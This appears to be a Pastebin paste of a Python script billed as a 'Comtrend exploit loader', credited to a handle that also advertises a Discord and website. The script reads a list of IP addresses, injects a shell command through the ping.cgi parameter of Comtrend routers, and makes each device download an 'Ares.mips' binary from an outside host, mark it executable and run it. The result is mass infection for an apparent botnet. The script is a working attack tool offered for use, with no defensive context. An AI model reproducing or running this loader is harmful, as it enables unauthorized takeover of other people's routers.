xB4ckdoorREAL

[COMTREND EXPLOIT LOADER] [RCE]

May 28th, 2020
777
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.10 KB | None | 0 0
  1. #!/usr/bin/env python
  2. # -*- coding: utf-8 -*-
  3. # COMTREND EXPLOIT LOADER MADE BY B4CKDOOR #
  4. # B4CKDOORARCHIVE.CLUB [NEWDOMAIN] | JOIN DISCORD BY WEBSITE INVITE LINK #
  5. import threading, sys, time, random, socket, re, os, struct, array, requests
  6. from threading import Thread
  7. from time import sleep
  8. import requests
  9. from requests.auth import HTTPDigestAuth
  10. from decimal import *
  11.  
  12. if len(sys.argv) < 2:
  13.     print "\033[37mUsage: python "+sys.argv[0]+" <list>\033[37m"
  14.     sys.exit()
  15.  
  16. ips = open(sys.argv[1], "r").readlines()
  17.  
  18. payload = 'cd /tmp; wget http://1.3.3.7/Ares.mips; chmod 777 Ares.mips; ./Ares.mips comtrend'
  19.  
  20. class b4ckdoor(threading.Thread):
  21.         def __init__ (self, ip):
  22.             threading.Thread.__init__(self)
  23.             self.ip = str(ip).rstrip('\n')
  24.         def run(self):
  25.             try:
  26.                 print "[COMCOM] INFECTING - " + self.ip
  27.                 url = "http://" + self.ip + "/ping.cgi?pingIpAddress=google.fr;"+payload+"&sessionKey=1039230114'"  
  28.                 requests.post(url, timeout=2)
  29.  
  30.             except Exception as e:
  31.                 pass
  32. for ip in ips:
  33.     try:
  34.         n = b4ckdoor(ip)
  35.         n.start()
  36.         time.sleep(0.03)
  37.     except:
  38.         pass#CODED BY B4CKDOOR
Add Comment
Please, Sign In to add comment